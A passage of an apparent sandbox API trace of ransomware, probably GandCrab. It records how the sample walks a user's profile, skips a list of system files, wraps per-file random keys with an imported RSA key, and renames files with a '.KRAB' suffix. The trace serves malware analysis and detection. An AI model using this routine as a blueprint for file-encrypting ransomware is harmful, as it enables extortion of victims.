dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1011898) returned 1 [0094.728] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.728] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.729] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.729] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0094.729] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.729] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.729] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1011678) returned 1 [0094.730] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd5a0) returned 1 [0094.730] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.730] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.730] GetLastError () returned 0x0 [0094.730] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0094.730] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0094.730] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1011238) returned 1 [0094.730] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd3e0) returned 1 [0094.731] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.731] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.731] GetLastError () returned 0x0 [0094.731] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0094.731] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0094.731] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG1" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0094.731] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.732] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.732] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0094.732] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2=".") returned 1 [0094.732] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="..") returned 1 [0094.732] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="ntuser.dat.LOG2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2") returned="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2" [0094.732] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.732] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2.KRAB") returned 42 [0094.732] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2") returned 37 [0094.733] lstrlenW (lpString=".LOG2") returned 5 [0094.734] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.734] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".LOG2 ") returned 6 [0094.734] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.734] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2") returned 37 [0094.734] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2") returned 37 [0094.734] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="desktop.ini") returned 1 [0094.734] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="autorun.inf") returned 1 [0094.734] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ntuser.dat") returned 1 [0094.734] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="iconcache.db") returned 1 [0094.734] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="bootsect.bak") returned 1 [0094.734] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="boot.ini") returned 1 [0094.734] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ntuser.dat.log") returned 1 [0094.734] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="thumbs.db") returned -1 [0094.735] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="KRAB-DECRYPT.html") returned 1 [0094.735] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.735] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.735] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ntldr") returned 1 [0094.735] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="NTDETECT.COM") returned 1 [0094.735] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Bootfont.bin") returned 1 [0094.735] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.735] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1010df8) returned 1 [0094.735] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.736] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.736] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.736] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0094.736] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.736] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.736] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1010df8) returned 1 [0094.737] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.737] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.738] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.738] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0094.738] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.738] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.738] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1011678) returned 1 [0094.738] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd5a0) returned 1 [0094.739] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.739] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.739] GetLastError () returned 0x0 [0094.739] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0094.739] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0094.739] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x10111b0) returned 1 [0094.739] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd5a0) returned 1 [0094.740] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.740] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.740] GetLastError () returned 0x0 [0094.740] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0094.740] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0094.740] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0094.740] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.741] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.741] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0094.741] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2=".") returned 1 [0094.741] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="..") returned 1 [0094.741] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" [0094.741] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.742] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf.KRAB") returned 82 [0094.742] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 77 [0094.742] lstrlenW (lpString=".blf") returned 4 [0094.742] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.742] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".blf ") returned 5 [0094.742] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.742] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 77 [0094.743] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 77 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="desktop.ini") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="autorun.inf") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntuser.dat") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="iconcache.db") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="bootsect.bak") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="boot.ini") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntuser.dat.log") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="thumbs.db") returned -1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="KRAB-DECRYPT.html") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntldr") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="NTDETECT.COM") returned 1 [0094.743] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="Bootfont.bin") returned 1 [0094.743] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.743] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1011898) returned 1 [0094.744] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.744] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.745] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.745] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0094.745] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.745] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.745] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1010e80) returned 1 [0094.746] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.746] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.746] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.746] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0094.746] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0094.746] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.747] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1010f90) returned 1 [0094.747] CryptImportKey (in: hProv=0x1010f90, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd3e0) returned 1 [0094.747] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.747] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.748] GetLastError () returned 0x0 [0094.748] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0094.748] CryptReleaseContext (hProv=0x1010f90, dwFlags=0x0) returned 1 [0094.748] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1010df8) returned 1 [0094.748] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd3e0) returned 1 [0094.748] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.748] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.749] GetLastError () returned 0x0 [0094.749] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0094.749] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.749] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0094.750] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.750] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.751] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0094.751] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0094.751] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0094.751] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" [0094.751] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.751] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms.KRAB") returned 119 [0094.751] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 114 [0094.751] lstrlenW (lpString=".regtrans-ms") returned 12 [0094.751] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.752] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".regtrans-ms ") returned 13 [0094.752] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.752] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 114 [0094.752] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 114 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="desktop.ini") returned 1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="autorun.inf") returned 1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat") returned 1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="iconcache.db") returned 1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="bootsect.bak") returned 1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="boot.ini") returned 1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="thumbs.db") returned -1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="KRAB-DECRYPT.html") returned 1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntldr") returned 1 [0094.752] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="NTDETECT.COM") returned 1 [0094.753] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0094.753] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.753] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x10111b0) returned 1 [0094.753] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.754] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.754] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.754] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0094.754] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0094.754] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.754] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1011678) returned 1 [0094.755] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.755] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.756] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.756] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0094.756] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0094.756] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.756] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1010df8) returned 1 [0094.756] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd3e0) returned 1 [0094.757] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.757] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0094.757] GetLastError () returned 0x0 [0094.757] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0094.757] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.757] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1011898) returned 1 [0094.757] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbd3e0) returned 1 [0094.757] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0094.757] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, 